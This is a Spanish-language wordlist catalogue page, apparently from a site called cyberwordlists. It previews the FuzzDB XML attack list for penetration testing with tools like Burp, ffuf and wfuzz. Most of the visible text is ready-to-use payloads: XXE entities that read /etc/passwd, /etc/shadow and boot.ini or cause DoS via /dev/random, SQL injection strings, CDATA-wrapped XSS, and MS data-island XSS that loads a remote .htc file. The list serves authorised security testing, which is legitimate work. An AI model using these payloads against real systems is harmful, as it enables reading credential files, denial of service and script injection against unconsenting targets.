Skip to content
cyberwordlists
Fuzzing2.9 KB

FuzzDB XML Attacks (XXE)

Payloads de ataque XML que incluyen lecturas de archivos mediante entidades externas XXE (/etc/passwd, boot.ini, DoS con /dev/random), SQLi/XSS envueltos en CDATA e inyecciones de data-islands de MS.

Ver fuente
Tamaño
2.9 KB
Categoría
Fuzzing
Fuente
fuzzdb-project/fuzzdb
Licencia
GPLv2
Herramientas recomendadas
burpffufwfuzz

Vista previa

Las primeras 15 entradas. Descarga o copia la lista completa (2.9 KB) con los botones de arriba.

>head xml-attacks-xxe-fuzzdb.txt2.9 KB
-
' or ''='
' or '1'='1
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://xss.rocks/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://xss.rocks/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
$

Payloads de ataque XML que incluyen lecturas de archivos mediante entidades externas XXE (/etc/passwd, boot.ini, DoS con /dev/random), SQLi/XSS envueltos en CDATA e inyecciones de data-islands de MS.

Esta lista está orientada al fuzzing de entradas y al descubrimiento de vulnerabilidades. Contiene aproximadamente 2.9 KB y combina bien con herramientas como burp, ffuf, wfuzz. Elige la lista más pequeña que se ajuste a tu engagement: las listas más cortas son más rápidas y silenciosas para los ataques en línea, mientras que las listas más grandes ofrecen una cobertura más amplia para el trabajo sin conexión, donde la velocidad supone menos limitación.

Puedes copiar la vista previa de muestra directamente desde esta página, copiar la lista completa a tu portapapeles o descargar el archivo .txt en bruto. La lista completa se sirve directamente desde su fuente original en GitHub.

Obtenido de fuzzdb-project/fuzzdb y distribuido bajo GPLv2. Utiliza las listas de palabras únicamente contra sistemas que tengas autorización explícita para probar.